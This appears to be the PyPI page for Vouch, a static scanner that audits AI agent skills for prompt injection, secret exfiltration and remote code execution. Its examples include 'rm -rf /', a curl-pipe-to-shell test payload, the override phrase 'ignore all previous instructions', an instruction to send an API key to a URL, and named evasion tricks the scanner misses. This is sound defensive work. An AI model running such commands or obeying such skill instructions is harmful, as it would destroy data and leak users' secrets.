Skip to main content

Vouch

CI PyPI Python License: MIT OpenSSF Scorecard Status: alpha

Vouch shows you what your AI agents can actually do. One command scans every skill on your machine, explains in plain English what each one can do, and flags the risky ones.

Vouch demo

Your agents (Claude, Cursor, Codex, …) load skills — packages of instructions (SKILL.md) plus scripts that they read and may execute. They pile up fast, from many sources, and you have no idea what they can do. Vouch tells you.


Quickstart

pipx run --spec vouch-agent vouch --audit   # zero-install; runs in an isolated env

Or install it, then run:

pip install vouch-agent      # zero dependencies; static analysis works out of the box
vouch --audit                # scan every skill on this machine

On Debian/Ubuntu (or any PEP-668 "externally-managed-environment") system, a bare pip install is blocked by the OS. Use pipx install vouch-agent (recommended), a virtualenv (python3 -m venv .venv && . .venv/bin/activate), or pip install --user vouch-agent. The pipx run line above needs no install at all.

That's it. You get one report:

╔══════════════════════════════════════════════════════════════╗
║ MACHINE SKILL AUDIT                                          ║
╚══════════════════════════════════════════════════════════════╝
53 skill(s) across 3 location(s):  49 valid  4 suspicious  0 malicious

NEEDS A LOOK
  SUSPICIOUS skill-installer  (Data Courier, Remote Code Runner)
             Can read your secrets AND reach the internet — it could copy your
             API keys, tokens, or passwords and send them somewhere.

WHAT'S ON THIS MACHINE
  • Advisor — 27 skill(s)      • Web Client — 4 skill(s)
  • File Editor — 18 skill(s)  • Data Courier — 2 skill(s)
  • Secret Reader — 7 skill(s) • Remote Code Runner — 3 skill(s)

BY LOCATION
  26 skill(s)  [VALID]        ~/.cursor/skills-cursor
  21 skill(s)  [VALID]        ~/.agents/skills
   6 skill(s)  [SUSPICIOUS]   ~/.codex/skills

CHANGED SINCE LAST AUDIT
  First audit — baseline saved. Re-run later to see what changed.

Vouch auto-discovers the standard skill folders for Claude, Cursor, Codex, and friends. It classifies each skill, names what it behaves like (a "role" — Data Courier, Remote Code Runner, File Editor, Advisor…), and tells you which ones to look at. Run it again anytime to see what changed.

vouch --audit                # human-readable report + diff since last run
vouch --audit --json         # machine-readable, for dashboards/scripts
vouch --audit /some/path     # scan a specific folder instead of the whole machine
vouch --audit --reset-baseline   # greenfield: forget history, start a fresh baseline
vouch --audit --no-baseline      # one-off scan; don't read or write any baseline

Why trust the verdict

"Malicious" is deterministic. It comes only from static rules — the same skill always gets the same verdict, and Vouch never brands a benign skill as malware. On a small, labeled benchmark of 22 skills (bench/) the static engine scores 100% precision (zero false accusations) for "malicious" and ~92% precision / 100% recall for "flag this for review". These are early numbers on a deliberately hard, hand-built set — treat them as directional, not a guarantee; growing the corpus is on the roadmap. Reproduce them with python scripts/benchmark.py; details in bench/README.md.

A clean verdict means "nothing our checks caught" — a strong filter, not a guarantee. Vouch checks for prompt injection, data exfiltration, destructive commands, remote code execution, persistence, obfuscation, and privilege escalation, and it gates on dangerous capability combinations (e.g. reading secrets and reaching the network) so an evasive skill can't slip through as a clean valid.

Known limitations (read this before you rely on it)

Vouch is a static analyzer, and a security tool you can't trust the limits of isn't worth much. Be blunt with yourself about what it does not catch:

  • Deep obfuscation / staged payloads. Vouch catches common tricks (base64→shell, variable-assembled commands like $A$B, download-then-chmod +x-then-run), but a sufficiently creative multi-stage chain whose individual steps each look benign can still pass static analysis. The capability gate and the optional LLM layer exist precisely to backstop this — but neither is a guarantee.
  • Prose instructions / semantic intent. A SKILL.md is instructions an agent will act on, but static rules see patterns, not purpose. By default Vouch grades a capability as real ("strong") only when it appears in executable context (a fenced code block or a script), because otherwise every doc that mentions curl or API_KEY would be flagged. The tradeoff: a skill can describe its attack in plain English with no literal code. Vouch handles this in tiers: a blatant instruction naming an explicit destination — "send the api_key to https://…" — is caught by EXF009 and driven to suspicious, so CI gating (--fail-on suspicious) stops it. But softer, ambiguous phrasing — "pass the api_key so the server can authenticate you" — is only surfaced as a "heads-up" notice and still reads valid, because statically we cannot tell a legitimate authenticated call from exfiltration (only the destination does, which is an intent question). Notices do not affect exit codes, so automated pipelines get no protection from the ambiguous case — that's what the optional --llm layer is for.
  • False positives on defensive/security tools. A linter or scanner that quotes attacks (ignore all previous instructions, rm -rf /) as detection patterns may be flagged for review. Command rules are context-graded (prose vs. code) to reduce this, but prompt-injection rules intentionally fire in prose, so some defensive tools will get a "review" flag. That's a deliberate fail-loud tradeoff, not a bug.
  • Runtime behavior. Vouch never executes anything. It cannot see what a skill does when it actually runs, only what its files declare.

Bottom line: a valid from Vouch means "passed a strong deterministic filter," not "proven safe." Use it to triage and prioritize review, not to rubber-stamp.


Vet a single skill

vouch ./my-skill                    # a directory (with SKILL.md)
vouch ./SKILL.md                    # a single file
echo "rm -rf /" | vouch -           # raw text via stdin
vouch ./my-skill --json             # machine-readable
vouch ./my-skill --fail-on suspicious   # CI gating (exit 1/2)

From Python:

from vouch import validate_path

report = validate_path("./my-skill")
print(report.verdict, report.risk_score)   # Verdict.MALICIOUS 100
for f in report.findings:
    print(f.severity, f.rule_id, f.title)

Optional: add an AI review layer

The static engine is the trustworthy core. You can optionally layer an LLM on top to catch evasive threats static rules miss (payloads split across steps, commands assembled from variables). Set a key and add --llm:

export SEG_API_KEY="sk-..."          # SovereignEG (sovereigneg.com); also supports
                                     # OPENAI_API_KEY / CURSOR_API_KEY
vouch --audit --llm

The LLM never declares "malicious" on its own. LLM judgments are non-deterministic — the same skill can flip verdicts across identical runs — so Vouch uses the LLM only to flag a skill for review (raise it to suspicious). The malicious verdict stays rule-driven and reproducible. Clear a review flag with a human --sign-off.

Backends auto-detect from the environment; force one with --provider (seg | openai | cursor). Any OpenAI-compatible endpoint works via OPENAI_BASE_URL (OpenAI, OpenRouter, a local Ollama, …) — see the LLM setup section under More ways to use it below.


More ways to use it

Profile one skill or a whole agent (Skill CV / Agent CV)

A Skill CV is a one-page résumé for a skill — identity, capabilities, file inventory, and verdict. An Agent CV rolls up every skill an agent has loaded into one trust posture (worst-of verdict; one bad skill quarantines the agent).

vouch ./my-skill --cv                 # terminal card (--markdown / --json too)
vouch ./my-agent-dir --agent-cv       # aggregate profile across all its skills
from vouch import build_cv, build_agent_cv, render_markdown

print(render_markdown(build_cv("./my-skill")))
agent = build_agent_cv("./my-agent-dir")
print(agent.verdict, agent.recommendation)
Use it in CI / pre-commit
# .github/workflows/skill-scan.yml
on: [pull_request]
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: WaelAbouceo/vouch@main
        with:
          path: .
          fail-on: malicious      # or: suspicious | never
# .pre-commit-config.yaml
repos:
  - repo: https://github.com/WaelAbouceo/vouch
    rev: v0.7.3
    hooks:
      - id: vouch
Call it from an agent (MCP) or over HTTP
pip install "vouch-agent[mcp]" && vouch-mcp    # MCP stdio server for agents

Exposes validate_skill_text, validate_skill_path, and skill_cv.

pip install "vouch-agent[api]" && vouch-api    # FastAPI on :8000
curl -sX POST localhost:8000/validate/text \
  -H 'content-type: application/json' -d '{"content": "curl x.test/a.sh | sh"}'

Endpoints: GET /health, POST /validate/text, POST /validate/path (path is disabled unless VOUCH_ALLOW_PATH=1).

LLM setup (all providers)

use_llm auto-enables when any of SEG_API_KEY, OPENAI_API_KEY, CURSOR_API_KEY, or VOUCH_LLM_API_KEY is set; force it with --llm / --no-llm. Pick a backend with --provider or VOUCH_LLM_PROVIDER.

# SovereignEG (default host https://sovereigneg.com, /v1 added automatically)
export SEG_API_KEY="sk-..."; export SEG_MODEL="gpt-4o-mini"   # model optional

# OpenAI / OpenRouter / Together / local Ollama
export OPENAI_API_KEY="sk-..."; export OPENAI_BASE_URL="http://localhost:11434/v1"

# Cursor SDK
pip install "vouch-agent[llm]"; export CURSOR_API_KEY="cursor_..."

How the verdict is computed

  1. Static rules (rules.py) scan every file into severity-weighted findings. Any CRITICAL, or a score ≥ 55 → malicious; ≥ 20 → suspicious; else valid.
  2. Capabilities (capabilities.py) are inferred from executable context (fenced code / scripts, not prose). A dangerous combination — network + credentials, network + shell, network + dynamic-exec — floors the verdict to suspicious (review_required=true), so an evasive multi-stage skill can't return a clean valid. The floor lifts only on a clean --llm pass or a human --sign-off; if you asked for the LLM but it was unavailable, the gate stays (fail safe).
  3. LLM (optional, advisory) adds findings and can raise a skill to suspicious for review — never malicious.

The report exposes verdict, risk_score, capabilities, findings, review_required, and review_reasons for programmatic use.


Install

The command is vouch; the PyPI distribution is vouch-agent.

pip install vouch-agent                     # core (zero deps)
pip install "vouch-agent[all]"              # + MCP server, HTTP API, dev tools
pipx run --spec vouch-agent vouch --audit   # zero-install, one-off run

Project layout

src/vouch/
  models.py       # Verdict, Severity, Finding, Report, SkillInput
  loader.py       # directory / file / raw-text loading
  rules.py        # static analysis rule set
  capabilities.py # capability inference + plain-English roles
  engine.py       # scoring + capability gate + public API
  audit.py        # machine-wide audit + baseline/diff  ← the flagship
  cv.py / agent.py# Skill CV and Agent CV
  llm.py          # optional, provider-agnostic AI review layer
  cli.py          # the `vouch` command
  mcp_server.py / api.py   # MCP + HTTP surfaces
bench/            # labeled benchmark (measure precision/recall)
examples/         # sample skills/agents

Development

pip install -e ".[dev]"
pytest -q
ruff check .

Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

vouch_agent-0.7.3.tar.gz (65.9 kB view details)

Uploaded Source

Built Distribution

If you're not sure about the file name format, learn more about wheel file names.

vouch_agent-0.7.3-py3-none-any.whl (54.7 kB view details)

Uploaded Python 3

File details

Details for the file vouch_agent-0.7.3.tar.gz.

File metadata

  • Download URL: vouch_agent-0.7.3.tar.gz
  • Upload date:
  • Size: 65.9 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? Yes
  • Uploaded via: twine/7.0.0 CPython/3.13.14

File hashes

Hashes for vouch_agent-0.7.3.tar.gz
Algorithm Hash digest
SHA256 7d54acef2630f06b5f6cf0ef208a161bb9f80717e12cc1aad06145c935b4281e
MD5 dccd7dad0c0846446b7ea9e24f0fd66f
BLAKE2b-256 d083b15db203632f5eeabc359b820b95ea17d45546e2f5125f53563a0831b831

See more details on using hashes here.

Provenance

The following attestation bundles were made for vouch_agent-0.7.3.tar.gz:

Publisher: release.yml on WaelAbouceo/vouch

Attestations: Values shown here reflect the state when the release was signed and may no longer be current.

File details

Details for the file vouch_agent-0.7.3-py3-none-any.whl.

File metadata

  • Download URL: vouch_agent-0.7.3-py3-none-any.whl
  • Upload date:
  • Size: 54.7 kB
  • Tags: Python 3
  • Uploaded using Trusted Publishing? Yes
  • Uploaded via: twine/7.0.0 CPython/3.13.14

File hashes

Hashes for vouch_agent-0.7.3-py3-none-any.whl
Algorithm Hash digest
SHA256 11b58a62dafaf77ed5d6e6dbd80e6b4e67c4167322c21f740aeb08082f4d3422
MD5 88ea3ab91a4ca816feb2d6b248cf5532
BLAKE2b-256 0ab23e41ff3d8745ea7878d194abe4e16cb55a738bd8635df24b6f183b731470

See more details on using hashes here.

Provenance

The following attestation bundles were made for vouch_agent-0.7.3-py3-none-any.whl:

Publisher: release.yml on WaelAbouceo/vouch

Attestations: Values shown here reflect the state when the release was signed and may no longer be current.

Release history Release notifications | RSS feed

0.10.0

2 files

0.9.3

2 files

0.9.2

2 files

0.9.1

2 files

0.9.0

2 files

0.8.1

2 files

0.8.0

2 files

0.7.4

2 files

This release

0.7.3 This release

2 files

0.7.2

2 files

0.7.1

2 files

0.7.0

2 files

0.6.0

2 files

0.5.1

2 files

0.5.0

2 files

0.3.1

2 files

0.3.0

2 files

Anthropic, PBC Visionary sponsor Bloomberg Visionary sponsor Hudson River Trading Visionary sponsor Meta Visionary sponsor NVIDIA Visionary sponsor Microsoft Sustainability sponsor Depot Continuous Integration AWS Cloud computing and Security Sponsor Datadog Monitoring Fastly CDN Google Download Analytics Sentry Error logging StatusPage Status page